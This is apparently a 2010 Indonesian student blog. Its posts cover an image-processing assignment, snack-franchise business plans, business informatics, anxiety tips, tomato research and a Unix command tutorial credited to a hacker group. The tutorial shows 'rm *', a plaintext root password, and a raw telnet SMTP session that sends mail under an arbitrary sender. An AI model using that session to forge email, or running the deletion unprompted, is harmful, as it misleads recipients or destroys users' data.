Sabtu, 27 November 2010

Tugas Pengolahan Citra


PENJELASAN TEORI

Pengolahan Citra

Citra (image) adalah istilah lain untuk gambar sebagai salah satu komponen multimedia memegang suatu peranan sangat penting sebagai bentuk informasi visual. Citra mempunyai karakteristik yang tidak dimiliki data teks yaitu citra kaya dengan informasi . Ada sebuah peribahasa yang berbunyi “sebuah gambar bermakna lebih dari seribu kata” (a picture is more than a thousand words) maksudnya adalah sebuah gamb

ar memberikan informasi

yang le

bih banyak daripada infor

masi tersebut disampaikan dalam bentuk kata-kata.

Pengolahan citra (image processing) adalah bidang tersendiri yang sudah cukup berkembang sejak orang mengerti bahwa komputer tidak hanya dapat menangani data teks, tetapi juga data citra. Pengolahan Citra merupakan proses pengolahan dan analisis citra yang banyak melibatkan persepsi visual. Proses ini mempunyai ciri data masukan dan informasi keluaran yang berbentuk citra. Istilah pengolahan citra digital secara umum didefinisikan sebagai pemrosesan citra dua dimensi dengan komputer. Dalam

definisi yang lebih luas, pengolahan citra digital juga mencakup semua data dua dimensi. Citra digital adalah barisan bilangan nyata maupun kompleks yang diwakili oleh bit-bit tertentu.

Program Threshold dengan Metode Otsu

Output :



















Program Deteksi Tepi

Output :

1: Prew

itt

2: Roberts

3: Laplacian of

a Guassian(LoG)

4: Canny

5: Exit

Enter your choice : 4






























lebih lanjut dari tugas ini kami upload di email bapak.

Kelas : 4 IA 11

Nama Anggota :

1. Fajriyatul Chusna 50407345

2. Fentya Hanifah Utami 50407360

Sabtu, 20 November 2010

Franchise Nangka Rase

Sekilas Tentang Nangke Rase
Nangka adalah buah yang nikmat, terutama pada saat dipanen buahnya. "Daging buah" yang matang seringkali dimakan dalam keadaan segar, dicampur dalam es, dihaluskan menjadi minuman (jus), atau diolah menjadi aneka jenis. Kini kami hadir dengan tampilan nangka yang berbeda. Perkenalkan franchise baru kami Nangke Rase dengan bahan dasar buah nangke dan diberi tambahan rasa – rasa baru. Nangke rase , berbentuk seperti asli nangka, agak sedikit kecil dan kosong. Nangka dibuat dari nangka pilihan nangka bubur yang terkenal sangat manis. Nangka berasal dari kota Sumatera dan Jawa, di kota asalnya nangka sangat digemari karena bentuknya yang rasanya enak dan garing..

Proses Penggorengan Nangka Rase
nangka pilihan yang telah disortir sesuai ukuran standard penjualan, lalu di goreng di dalam minyak, setelah warna kecoklatan, diangkat lalu tiriskan hingga minyak tak tersisa di nangka. Yang unik adalah pada pegepakan k wada h plastik, pembeli disuguhkan rasa – rasa yang beragam dari rasa buah – buahan yang lain sampai rasa seperti manis, pedas, asin dan asam. Adapun rasa yang di double dengan harga yang sesuai daftar menu.

Yang anda dapatkan:
1. Stand dengan desain menarik
2. 1 set perlengkapan lengkap
3. Bahan baku awal
4. Pelatihan karyawan
5. Seragam
6. Banner
7. Spanduk

Proses kemitraan:
1. Isi formulir
2. Penjelasan mengenai kemitraan
3. Survey lokasi
4. Penandatanganan kontrak dan pembayaran investasi (50%)
5. Pembuatan stand
6. Training karyawan dan pelunasan investasi
7. Pengiriman peralatan dan bahan baku
8. Opening


Analisa keuntungan
Investasi : Rp 13.000.000
Omset per bulan* : Rp 9.000.000
(200pcs@ Rp 1.500 x 30 hari)

Pemakaian bahan baku : Rp 3.500.000
Minyak goreng dan gas elpiji : Rp 500.000
Gaji karyawan : Rp 1.000.000
Sewa tempat : Rp 500.000

Total pengeluaran : Rp 5.500.000

Laba bersih : Rp 3.500.000

Catatan:
* Harga jual dapat disesuaikan dengan lokasi. Harga jual terendah adalah Rp 1.500 dan tertinggi Rp 2.500.


Keuntungan menjadi mitra:
1. Modal tidak terlalu besar
2. Tidak membutuhkan area yang luas sehingga biaya sewa dapat diminimalisir
3. Cukup hanya dengan satu karyawan sehingga biaya operasional dapat diminimalisir
4. Tidak dipungut royalty fee
5. Tingkat pengembalian yang cepat
6. Tidak memerlukan pengalaman atau keahlian awal
7. Mendapatkan support pemasaran dari principal
8. Jaminan kualitas produk karena bahan baku disupply dan dikontrol ketat oleh principal

Kelompok
Dhika Yudha Prasetyo (50407259)
Fajryatul Chusna (50407345)
Stefanus Oktav (50407817)

4IA11

Jumat, 12 November 2010

Bisnis Usaha Pisang Goreng

Peluang Bisnis Usaha Franchise Pisang Goreng


Pisang goreng. Makanan kecil ini bukan hanya dapat dijumpai di tukang gorengan pinggir jalan, dengan “tampang” lecek dan cuma seukuran jari, melainkan juga bisa ditemui di hotel berbintang dengan “wajah berbedak” keju atau cokelat dan harga puluhan ribu, serta nama kebarat-baratan

Pisang goreng termasuk makanan yang fast moving. Maka jika Anda ingin menekuni bisnis ini hanya membutuhkan waktu 2-3 bulan untuk bisa balik modal.

“Sebagai bisnis fast moving, bila ditekuni, omset yang diraup dari camilan yang rasanya sepat-sepat manis ini, sangat menggiurkan. Contoh, jika dalam sehari kita mampu menjual minimal 500 potong dengan harga Rp2.000,-/potong, maka dalam sehari kita bisa membukukan omset minimal Rp1.000.000,-,” kata Ery Ashok, kreator pisang goreng Ta B’nana.
Tak pelak, bisnis makanan kecil yang digemari semua kalangan ini mengalami booming. Kondisi ini berimbas pula terhadap Ta B’nana, si pisang goreng crispy. Tanggapan konsumen yang sangat baik, berlanjut pada desakan untuk mewaralabakan Ta B’nana.

Sejak Juli 2006, pisang goreng yang memiliki keistimewaan garing dan renyah ini, difranchisekan dengan sistem rekanan atau semi franchise. Maksudnya, “franchisee”-nya yang kini jumlahnya lebih dari 10 serta tersebar di Jakarta, luar Jawa, dan Malaysia, hanya diharuskan membeli bumbunya.

Dengan berjalannya waktu, Ta B’nana yang baru saja mendapat penghargaan dari Museum Rekor Indonesia sebagai Makanan Kecil dengan Outlet Terbanyak. Dengan itu, franchisee mendapat 5 kg tepung dan 10 kg crispy seharga Rp20 ribu/kg, gratis.

Jika bahan baku tersebut sudah habis, mereka diharuskan membeli lagi ke franchisor. “Kami menjanjikan Return of Investment dalam waktu 2–3 bulan dan profit margin 20%–30%, dengan asumsi 500 pisang terjual per hari!” tegasnya. Selain itu, franchisor juga mengajarkan know-how-nya. Sebagai bisnis makanan kecil, Ery memberlakukan franchise ini dengan lunak. Misalnya, jika franchisee ingin menyediakan peralatan sendiri, maka franchise feenya dapat dikurangi sebesar Rp3,5 juta.

Demikian pula dengan variasi pisang goreng yang dijajakan, franchisee diizinkan menambahi topping stroberi, keju, atau cokelat. “Untuk harga pisangnya, sejauh ini pisang Ta B’nana dijual dengan harga Rp2.000,- tapi bila franchisee mau menjual dengan harga lebih mahal karena alasan-alasan tertentu ya silahkan. Yang penting jualan laku,” ujarnya.

Untuk lokasi outlet juga tidak ada ketentuan mutlak. “Yang penting berada di kawasan yang ‘ramai’ dan dalam bentuk kios agar proses kerjanya lebih mudah. Karena, pisang dan peralatan kerjanya kan harus disimpan di tempat itu juga,” tambahnya.

Namun, pada kondisi-kondisi tertentu, juga berlaku aturan-aturan tertentu. “Kalau menyalahi aturan terlalu banyak ya kami tegur. Misalnya, pada dasarnya Ta B’nana cuma menjual pisang goreng. Kalau mau menjual gorengan lain ya silahkan, tapi jangan gorengan yang membuat minyaknya bau,” katanya.

Di samping itu, dengan pemberitahuan terlebih dulu, lisensi franchise ini dapat dipindahtangankan. Pada dasarnya, bisnis pisang goreng itu bisnis dengan modal dan risiko kecil.


Sumber : http://www.karir-up.com
: http://info-
pengusaha-sukses.blogspot.com/2009/05/franchise-pisang-goreng-cepat-untung.html

Jumat, 05 November 2010

usaha pulsa elektrik

-Rya Cell-

..Dalam blog saya kali ini, saya mendapatkan tugas unuk membuat usaha pulsa elektrik..

Usaha ini sangat mudah dilakukan karena kita hanya bermodalkan handphone saja untuk bertransaksi. Jadi cara usaha ini, kita hanya mendaftarkan ke pusat pulsa center yang kita mau ajak bekerja sama. Setelah kita mendaftar dan memiliki modal pulsa, kita dapat bertransaksi dengan customer yang ingin membeli pulsa dengan kita. Hanya dengan cara via sms yang kita lakukan ke pulsa center, dan pulsa center itu akan mentransfer pulsa ke customer dan secara otomatis modal pulsa kita akan berkurang di setiap transaksinya. Apabila modal kita habis, kita dapat mengisi modal pulsa dengan via rekening ke rekening pusat pulsa center maka modal kita akan bertambah.

….Selamat mencoba usaha mudah ini….

Jumat, 08 Oktober 2010

Pengantar Bisnis Informatika



Bisnis & Informatika. Memiliki dua arti yang saling berbeda, tetapi jika kata tersebut di padu padankan memiliki suatu keterikatan yang mempunyai satu makna.
Apa itu Bisnis Informatika?? Mungkin hal ini awam bagi kebanyakan orang. Dalam pengertian yang sederhana bisnis informatika adalah suatu kegiatan yang dilakukan individu atau sekelompok orang yang memiliki nilai (value) dengan tujuan mendapatkan keuntungan (profit) yang dilakukan dengan bantuan teknologi informasi. Yang dimaksud teknologi informasi disini mencakup semua hal yang berkaitan dengan teknologi informasi, seperti internet. Untuk lebih jelasnya penulis akan mencoba menjabarkannyapada tulisan kali ini. Penulis akan membahas satu persatu mengenai makna Bisnis Informatika.

1. Bisnis
1.1 Pengertian Bisnis.
  • Bisnis dalam arti luas adalah istilah umum yang menggambarkan semua aktifitas dan institusi yang memproduksi barang & jasa dalam kehidupan sehari - hari.
  • Bisnis merupakan suatu organisasi yang menyediakan barang dan jasa yang bertujuan untuk mendapatkan keuntungan.[Griffin & Ebert]
Dari pendapat diatas dapat disimpulkan bahwa bisnis adalah kegiatan yang dilakukan individu atau sekelompok orang (organisasi) yang menciptakan nilai (create value) melalui penciptaan barang dan jasa untuk memenuhi kebutuhan masyarakat dan memperoleh keuntungan melalui transaksi.

1.2 Aspek - Aspek Bisnis
  • Keuntungan individu dan kelompok
  • Penciptaan Nilai
  • Penciptaan Barang dan Jasa
  • Keuntungan melalui Transaksi
1.3 Fungsi Bisnis
  • Fungsi Mikro (Kontribusi terhadap pihak yang berperan langsung)
  • Fungsi Makro(Kontribusi terhadap pihak yang tidak berperan langsung)
2. Informatika
Informatika berkaitan erat dengan teknologi informasi. Teknologi Informasi adalah suatu seperangkat alat yang membantu kita dalam bekerja dengan informasi dan melakukan tugas - tugas yang berhubungan dengan pemrosesan informasi. Teknologi informasi tidak hanya terbatas pada teknologi komputer melainkan mencakup juga teknologi komunikasi untuk mengirim atau menyebarkan informasi. Dari defenisi di atas, nampak bahwa teknologi informasi tidak hanya terbatas pada teknologi komputer, tetapi juga termasuk teknologi telekomunikasi. Dengan kata lain bahwa teknologi informasi merupakan hasil konvergensi antara teknologi komputer dan teknologi telekomunikasi.

3.
Bisnis Informatika

Setelah menelaah dari pengertian - pengertian diatas didapat maksud dari bisnis informatika. Menurut saya Bisnis Informatika adalah suatu kegiatan yang dilakukan individu atau sekelompok orang (organisasi) yang memiliki nilai (value) dengan tujuan mendapatkan keuntungan (profit) yang dilakukan dengan bantuan teknologi informasi.

Bisnis informatika berkembang dengan pesat akhir - akhir ini seiring dengan berkembang pesatnya pula teknologi informasi. Kenapa begitu? Karena Bisnis Informatika muncul karena adanya peluang yang terdapat di dalam suatu teknologi informasi. Apa itu? Jawaban salah satunya Internet. Tidak dapat di pungkiri sekarang internet sudah mengalami pergeseran kebutuhan di dalam masyarakat. Yang dahulu Internet merupakan suatu kebutuhan pelengkap atau masih merupakan kebutuhan yang "mewah" bagi sebagian masyarakat, sekarang menjadi suatu kebutuhan sekunder ataupun kebutuhan primer. Kenapa bisa begitu? Karena sekarang kita dapat semakin mudah dan murah untuk mendapatkan akses internet.Hal ini tidak lepas dari semakin berkembangnya teknologi informasi.

Lalu muncul pertanyaan,apa- apa saja yang mencakup bisnis informatika?
Menurut saya semua kegiatan yang melakukan trAnsaksi jual - beli yang ada kaitannya dengan teknologi informasi masuk kedalam bisnis informatika. Contoh, sekarang sudah banyak masyarakat yang melakukan transaksi jual - beli secara online. Jadi kita tidak perlu repot-repot untuk jalan ke mall, ataupun toko - toko untuk mencari barang yang kita inginkan. Cukup dengan modal laptop/pc dan internet, kita bisa mencari semua barang yang diinginkan.

Banyak sekali web - web penyedia jual - barang secara online. Contoh E-Bay dan di dalam negri ada KASKUS. Saya pernah melihat acara tv yang sedang membahas bisnis online. Dijelaskan bahwa di KASKUS setiap harinya minimal terjadi 5 ribu(kalau tidak salah) transaksi jual - beli. Dimana kisaran transaksi terendah di rata- rata sebesar 30 ribu. Nah sekarang tinggal dikalikan saja 30 ribu x 5 ribu. Mencengangkan bukan. Betapa banyaknya perputaran uang yang ada di dalam bisnis informatika ini. Itu baru di dalam media internet, belum lagi kita lihat perkembangan warnet di indonesia. Kalau pemerintah mau serius, kita bisa mendapatkan hasil yang sangat banyak di dalam Bisnis Informatika ini.

4. Peranan Teknlogi Informasi di bidang Bisnis

Di bidang bisnis baik perdagangan barang maupun jasa komputer peranan teknologi informasi akan sangat penting untuk kegiatan transaksi baik rutin, periodik, maupun insidental dan menyediakan banyak informasi dengan cepat dan tepat.

Sistem Informasi Manajemen

Sistem informasi manajemen (Management Information System –MIS), merupakan sistem informasi yang sudah banyak diterapkan pada perusahaan yang bergerak di bidang perdagangan barang dan jasa baik pada perusahaan besar, menengah, atau perusahaan kecil. SIM dapat diterapkan pada semua tingkat atau level manajemen yang ada yaitu manajemen tingkat atas (top management), manajemen tingkat menengah (middle management), dan manajemen tingkat bawah (lower management).

Di perusahaan dagang seperti department store, telah dipergunakan mesin cash register (mesin kasir) yang dilengkapi dengan kendali komputer sehingga mesin tersebut dapat dikendalikan oleh pihak manajer hanya dari ruang kerjanya secara cepat dan tepat, untukscanning barcode kode barang dagangan, menghitung laba rugi, inventaris, dan sebagainya.

Di bidang perbankan, salah satu solusi sistem informasi perbankan telah diperkenalkan oleh perusahaan besar seperti Hewlett-Packard (HP), yang bekerja sama dengan Infosys telah memperkenalkan solusicore banking, yang disebut Finacle kepada bank-bank di Indonesia. Finacle memberikan solusi bagi bank yang ingin melakukan up-gradeterhadap sistem yang telah mereka miliki. Dengan menggunakan Finacle, up-grade sistem bisa dilaksanakan dengan resiko investasi maupun kegagalan migrasi yang rendah. Ini penting bagi bank-bank agar mampu menghadapi siklus bisnis yang selalu berubah. Dengan solusi terpadu ini – berupa software dan hardware, jaringan, sistem integrasi, serta opsi consulting dan outsourcing – bank juga akan memiliki nilai tambah sehingga menjadi lebih kompetitif.

Perkembangan teknologi informasi telah mempengaruhi kebijakan dan strategi dunia usaha perbankan yang selanjutnya lebih mendorong inovasi dan persaingan di bidang layanan terutama jasa layanan pembayaran melalui bank. Inovasi jasa layanan perbankan yang berbasis teknologi tersebut terus berkembang mengikuti pola kebutuhan nasabah bank. Transaksi perbankan berbasis elektronik, termasuk internet dan menggunakan handphone merupakan bentuk perkembangan penyedia jasa layanan bank yang memberikan peluang usaha baru bagi bank yang kerakibat pada perubahan strategi usaha perbankan, dari yang berbasis manusia (tradisional) menjadi berbasis teknologi informasi yang lebih efisien dan praktis bagi bank. Pada perusahaan jasa seperti perbankan komputer digunakan untuk menghitung bunga secara otomatis, transaksi on-line, ATM, dan sebagianya.

Komputer juga banyak digunakan untuk proses akuntansi, melakukan analisis keuangan, neraca, laba-rugi, dan sebagainya. Bahkan ada beberapa software yang secara khusus disediakan untuk operasi akuntansi. Di bidang perhotelan komputer digunakan untuk menentukan jumlah dan jenis kamar yang telah terisi dan masih kosong. Bahkan saat ini pada penjualan pertokoan kecil, usaha kecil dan menengah (UKM), apotek dan bermacam-macam usaha kecil lainnya juga telah banyak menggunakan komputer.

sumber : http://teknik-informatika.com/teknologi-informasi-bidang-manajemen

tri_s.staff.gunadarma.ac.id/.../files/.../pengertian+dan+fungsi+bisnis.pdf

sumber : febri_irbef

Senin, 19 April 2010

Tugas Softskill 'Event About Game "Runes of Magic"'

Dalam konsep breaking a game down into events terdapat 6 hal yang perlu diperhatikan, yaitu :
1. Initialization
2. Start
3. End
4. Activation dan Deactivation
5. Paint
6. Cycle

1. Initialization
Initialization yaitu suatu tampilan yang berisi tentang bagaimana cara memainkan permainan ini. Pada games runes of magic untuk dapat memainkannya yaitu pengguna harus memiliki DVD client installer yang bisa di dapat di game-on LYTO.

2. Start
Pada awal dari games runes of magic adalah pengaturan karakter. Pembuatan karakter dalam permainan ini cukup standar seperti pemilihan moel rambut, wajah, dan pilihan ukuran tubuh yang cukup detil. Setelah semuanya dipilih, pengguna dapat langsung memainkan permainan ini.

3. End
Pada permainan ini akan berakhir apabila pemain telah menyelesaikan semua level yang telah ditentukan.
4. Activation dan Deactivation
Daftarkan dirimu sebelum dapat memainkan permaianan ini dengan mendaftar terlebih dahulu di website www.romonline.web.id atau www.wavepro.co.id. Atau kamu juga dapat langsung mendaftar pada launcher Runes of Magic jika telah meng-install client-nya di komputermu. Dan untuk deactivation masa aktifnya hanya berlaku 7 hari. Apabila lebih dari itu maka permainan anda akan terulang lagi dari awal.

5. Paint
Ukuran frame 1024 x 768

6. Cycle
Dalam game ini dapat berteam dalam memainkannya.

Sabtu, 06 Maret 2010

Cara Menghadapi Rasa Cemas




Rasa cemas itu bisa menjadi racun bagi kesehatan mental. Rasa cemas bisa menyebabkan toxic worry, keadaan dimana seorang manusia merasa seperti lumpuh dan tak berdaya. Gimana cara menghadapinya?


"Toxic worry ini menghalangi performance seseorang," kata Edward Hallowell, M.D., penulis Worry: Controlling It and Using It Wisely. "Anda bisa saja cemas berlebihan hanya gara-gara mau kencan. Terus, bukannya memilih busana yang oke, Anda malah nggak jadi pergi sama sekali," katanya memberi contoh.

Teori sang dokter adalah, si cemas yang beracun itu berakar di struktur otak; dan selama krisis, orang yang menderita kecemasan akan merasa berada dalam keadaan yang disebut 'brain burn' (kekacauan temporer yang bikin seseorang susah berpikir jernih).



Toxic worry bisa dihilangkan dengan cara yang sama seperti kita meredakan stres. Selain itu, ada langkah-langkah lain yang bisa dicoba:

1. Jangan mengisolasi diri Anda sendiri
Bila Anda tidak bisa berhenti memikirkan sesuatu yang mencemaskan, cepat telepon teman. Anda akan merasa lebih punya kekuatan bila membaginya.

2. Cari fakta-fakta yang sebenarnya
Banyak kejadian memperlihatkan bahwa kecemasan 'beracun' sering diakibatkan oleh ketiadaan atau kesalahan informasi. > Misalnya, seorang wanita cemas berminggu-minggu karena haidnya tidak datang. Padahal, itu bukan karena hamil, melainkan ia sedang mengalami stres.

3. Buatlah rencana
Seranglah kecemasan itu, ketimbang Anda membiarkan ia menyerang Anda. Misalnya, jika uang yang Anda cemaskan, mintalah nasihat dari financial advisor atau mereka yang lebih berpengalaman.

Tomat cegah kanker prostat




satulelaki.com - Seringkali kita mendengar pria mempunyai masalah dengan prostat. Banyak bahkan yang kena kanker prostat, yang tentu saja berbahaya. Lalu bagaimana agar bisa terhindar dari kanker prostat itu? Makanlah tomat atau produk yang kandungan tomatnya banyak, begitu menurut peneliti!

Kalau Anda berdiet dengan mengkonsumsi makanan yang kandungan tomatnya besar, maka rendahlah risiko Anda mengalami kanker prostat. Tidak perlu tomat mentah, produk lainnya yang mengandung banyak tomat pun bisa mencegahnya.

Sebab buah yang sekaligus sayuran ini banyak mengandung antioksidan, yang bisa merendahkan risiko kanker prostat, demikian menurut penelitian.

Para peneliti menganalisa pilihan makanan dan sejarah kanker prostat pada lebih dari 47.000 pria dan menemukan bahwa mereka yang makan makanan yang mengandung tomat sedikitnya dua kali seminggu bisa merendahkan risiko kanker prostat mereka hingga mencapai 24% sampai 36%.

Dr Edward Giovannucci dari Brigham dan RS Wanita Sekolah Kesehatan Masyarakat Harvard, yang juga menulis laporan ini mengatakan bahwa penelitian mereka mendukung penelitian sebelumnya yang menyangkit makanan, terutama makanan produk tomat, yang kaya akan likopene atau antioksidan yang sangat kuat.

"Penemuan terbaru ini mendukung pendapat bahwa diet makanan yang mengandung tomat dan makanan likopene, termasuk juga buah-buahan dan sayur-sayuran, kemungkinan bisa mengurangi risiko kenker prostat," kata Giovannucci.

Dalam laporan yang dikeluarkan Journal of the National Cancer Institute menyebutkan bahwa likopene tampaknya melindungi diri terhadap kanker dengan menyerap radikal bebas oksigen, yang merupakan bahan kimia yang dibuat selama metabolisme yang bisa merusak struktur genetik sel-sel.

Penemuan ini berdasarkan sebuah data dari Penelitian Lanjutan Profesional Kesehatan, sebuah proyek yang mengikuti sejarah kesehatan dan kebiasaan diet 47 ribu pria,yang berusia 40 sampai 75 tahun dari tahun 1986 sampai 1998. Selama periode itu, 2.481 orang terkena kanker prostat.

Selama itu diberikan kuesioner yang menanyakan berbagai hal tentang makanan seperti tomat, saus tomat, jus tomat, pizza, semangka dan lain sebagainya.

Ketika data disesuaikan dengan pengaruh makanan dan faktor-faktor kehidupan lainnya, peneliti menemukan bahwa tomat, terutama yang dimasak itu sangat bermanfaat untuk melawan kanker.

"Saus spageti itu yang paling populer, dan tampaknya memberikan perlindungan yang paling besar," kata Giovannucci.

Menurutnya, memasak tomat mentah, seperti halnya saus spageti, mungkin merusak dinding sel dari buah dan memudahkan tubuh untuk menyerap lebih banyak likopen.

Sabtu, 27 Februari 2010

UNIX



Dasar-dasar Perintah Unix
Tentu Rekan - Rekan Sekalian ingin Mengatahui sebagian Perintah Unix? pada berbagai Clone Unix (BSD,Linux,Sunos,System V,SCO,IRIX,AIX) hampir mempunyai persamaan satu sama lain nya. Sebagai Contoh saya berikan Cara menjalankan perintah Linux ini sebagian saya ambil dari tutorial Kecoak Elektronik dan Perintah Jitu dari HAcker Israel yaitu Mixter
:: Tutorial CyberBug
PERINTAH-PERINTAH UNIX
Sebelum lanjut perlu diingat bahwa di Linux/UNIX semua perintah ditulis dalam huruf kecil,dan Linux/UNIX membedakan huruf besar dan kecil.
------> ls
Ingat perintah DIR di DOS? ... nah perintah ini sama dgn DIR, gunanya untuk menampilkan 'list' file di dalam directory. Perintah ls juga dilengkapi dengan flag tambahan yang bisa di lihat dengan mengetik :
ls --help ; menampilkan bantuan
man ls ; man bisa juga diartikan manual, jadi manual ls
Beberapa perintah ls yang umum adalah :
ls -l ; menampilkan informasi tambahan (l = long)
ls -a ; menampilkan hidden file (a = attribute)
ls -la
Informasi tambahan yang ditampilkan oleh flag -l menyangkut user yang memiliki 'owns', file tanggal dan jam file itu dibuat, hak/permissions file, dan informasi lain, contoh :
rwxr-x--x
Catatan :
karakter 1-3: user/owner permissions
karakter 4-6: group permissions
karakter 7-8: other permissions
This is what the letters mean:
r - read, permissions utk 'baca'
w - write, permission utk 'tulis'
x - (e)xecute, permission utk 'menjalankan'
Jadi pada contoh diatas :
user/owner dapat read/baca, write/tulis dan execute/jalankan file yg satu group dgn user/owner dpt read/baca, execute/jalankan file
user lain dapat execute/menjalankan file tsb - berarti permission tidak ada, jika ada d sebelum permission berarti itu adalah directory
------> cat
Cat atau concatenate dipakai untuk menampilkan dan menulis/membuat file, kira-kira sama dengan perintah TYPE di DOS. Untuk menampilkan isi file ketik : "cat " Untuk membuat file ketik : "cat > " ketik isi file dan utk menyimpan tekan CTRL + C atau CTRL + D kalau namafile sudah ada file tersebut akan ditimpa, jika kita ingin data ditambahkan kefile yang
sudah ada ganti > dengan >>
------> more
Menampilkan isi dari file, perlayar, tekan q untuk quit more jilid1.txt
-----> grep
Menampilkan semua baris yang mengandung pola yang diinginkan grep kecoak jilid1.txt akan menampilkan semua baris teks yang mengandung kecoak di file jilid1.txt
-----> man
UNIX help/manual, ketik : man untuk eksekusi.
man pwd
-----> echo
echo dipakai utk menampilkan apa yang kita ketik di layar, seperti :
echo "saya belajar linux"
saya belajar linux
atau untuk membuat file, seperti :
echo "biff n" > .profile
yang akan membuat file .profile di directory aktif yg berisi teks "biff n" atau menambah file isi file dgn mengganti > dengan >>
------> cp
copy, dipakai untuk mengcopy file.
cp jilid1.txt jilid1.txt.backup
cp jilid1.txt ~cyberbug/backup/jilid1.txt.backup
------> mv
move, mengganti nama file atau directory
mv jilid1.txt jilid1a.txt
mv backup bak
------> rm
remove, hapus file
rm jilid1.txt ; hapus file jilid1.txt
rm * ; hapus semua file di directory aktif (hati-hati!)
------> cd
change directory, dipakai untuk pindah directory, sama dengan perintah CD di DOS
cd /root
perhatikan bahwa di Linux yang digunakan adalah / (slash) bukan \ (backslash)
------> mkdir
make directory, membuat directory
mkdir backup
------> rmdir
remove directory, hapus directory, file-file dalam directory harus dihapus dulu sebelum menghapus directory.
rmdir backup
------> who
who digunakan untuk menampilkan user yang login ke system, hasilnya kira-kira sebagai berikut :
cyberservices:~$ who
root tty1 Dec 20 17:47
cyberbug tty2 Dec 20 17:48
cyberbug tty3 Dec 20 17:48
cyberbug ttyp0 Dec 20 18:43 (localhost)
Kolom pertama menunjukkan nama user yang login, kolom kedua menunjukkan terminal line yang digunakan, kolom ketiga menunjukkan waktu login dan kolom keempat menunjukkan domain atau IP asal mereka koneksi, jika kosong berarti mereka main langsung dari console.
------> whoami
Kalo lupa diri :) ini perintahnya : Siapakah Aku?
cyberservices:~$ whoami
cyberbug
------> who am i
Ini juga kalo sudah lupa daratan :))
cyberservices:~$ who am i
cyberservices!cyberbug tty3 Dec 20 17:48
------> pwd
Tampilkan directory aktif, pwd = print working directory, perintah yang dipakai kalo saat
jalan2, sudah gak tau mo pulang lewat mana :)
cyberservices:~$ pwd
/home/cyberbug
------> ps
Menampilkan proses yang aktif
cyberservices:~$ ps
PID TTY STAT TIME COMMAND
87 2 S 0:00 -bash
88 3 S 0:00 -bash
1440 2 S 0:00 pico jilid2.txt
1443 3 R 0:00 ps
------> ping
Mengecek host apakah 'up' utk istilah teknisnya silakan 'man ping'
cyberservices:~$ ping localhost
PING localhost (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.2 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.1 ms
--- localhost ping statistics ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 0.1/0.1/0.2 ms
cyberservices:~$ ping 127.0.0.1
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.2 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.1 ms
--- 127.0.0.1 ping statistics ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 0.1/0.1/0.2 ms
cyberservices:~$
Perhatikan bahwa localhost dan 127.0.0.1 adalah sama :)
127.0.0.1 adalah local loopback yang disediakan untuk testing.
------> finger
Mencari informasi user
cyberservices:~$ finger
Login Name Tty Idle Login Time Office Office Phone
cyberbug CyberBug 2 Dec 22 01:10
cyberbug CyberBug 3 Dec 22 01:10
root 1 1:37 Dec 22 01:10
cyberservices:~$ finger @cyberservices.com
[cyberservices.com]

Welcome to Linux version 2.0.34 at cyberservices.com !
3:46am up 2:37, 3 users, load average: 0.00, 0.00, 0.00
Login Name Tty Idle Login Time Office Office Phone
cyberbug CyberBug 2 Dec 22 01:10
cyberbug CyberBug 3 Dec 22 01:10
root 1 1:39 Dec 22 01:10
cyberservices:~$ finger @localhost
[localhost]

Welcome to Linux version 2.0.34 at cyberservices.com !
3:47am up 2:38, 3 users, load average: 0.00, 0.00, 0.00
Login Name Tty Idle Login Time Office Office Phone
cyberbug CyberBug 2 Dec 22 01:10
cyberbug CyberBug 3 Dec 22 01:10
root 1 1:40 Dec 22 01:10
cyberservices:~$ finger cyberbug
Login: cyberbug Name: CyberBug
Directory: /home/cyberbug Shell: /bin/bash
On since Tue Dec 22 01:10 (PHT) on tty2 8 seconds idle
On since Tue Dec 22 01:10 (PHT) on tty3
Last login Tue Dec 22 01:13 (PHT) on tty4
Mail forwarded to "|IFS=' '&&exec /usr/bin/procmail -f-||exit 75
#cyberbug"
No mail.
No Plan.
cyberservices:~$ finger root
Login: root Name:
Directory: /root Shell: /bin/bash
On since Tue Dec 22 01:10 (PHT) on tty1 1 hour 42 minutes idle
Mail last read Tue Dec 15 09:19 1998 (PHT)
No Plan.
------> telnet
Melakukan komunikasi dengan host lain melalui telnet protocol
cyberservices:~$ telnet localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

Welcome to Linux 2.0.34.
cyberservices login: cyberbug
Password: 3m4nggu3p1k1r1n
Linux 2.0.34.
Last login: Tue Dec 22 01:13:52 on tty4.
No mail.
cyberservices:~$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 cyberservices.com ESMTP Sendmail 8.9.0/8.9.0; Tue, 22 Dec 1998
03:52:51 +0800
helo darling
250 cyberservices.com Hello cyberbug@localhost [127.0.0.1], pleased to
meet you
mail from: guest@cyberservices.com
250 guest@cyberservices.com... Sender ok
rcpt to: untukmu@seorang.jauh.disana
250 untukmu@seorang.jauh.disana... Recipient ok (will queue)
data
354 Enter mail, end with "." on a line by itself
Kukirim lagu dan salam rinduku
.
250 EAA01615 Message accepted for delivery
quit
cyberservices:~$ telnet localhost 110
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
+OK cyberservices POP3 Server (Version 1.005l) ready at 03:53:35 1998>
user root
+OK please send PASS command
pass 3m4nggu3p1k1r1n
+OK 2 messages ready for root in /usr/spool/mail/root
stat
+OK 2 7227
retr 1
quit
------> ftp
Menggunakan file tranfer program
cyberservices:~$ ftp localhost
Connected to localhost.
220 cyberservices.com FTP server (Version wu-2.4.2-academ[BETA-15](1) Wed
May 20 13:45:04 CDT 1998) ready.
Name (localhost:cyberbug): ftp
331 Guest login ok, send your complete e-mail address as password.
Password: cyberbug@k-elektronik.org
230-Welcome, archive user! ... blah
blah ... blah
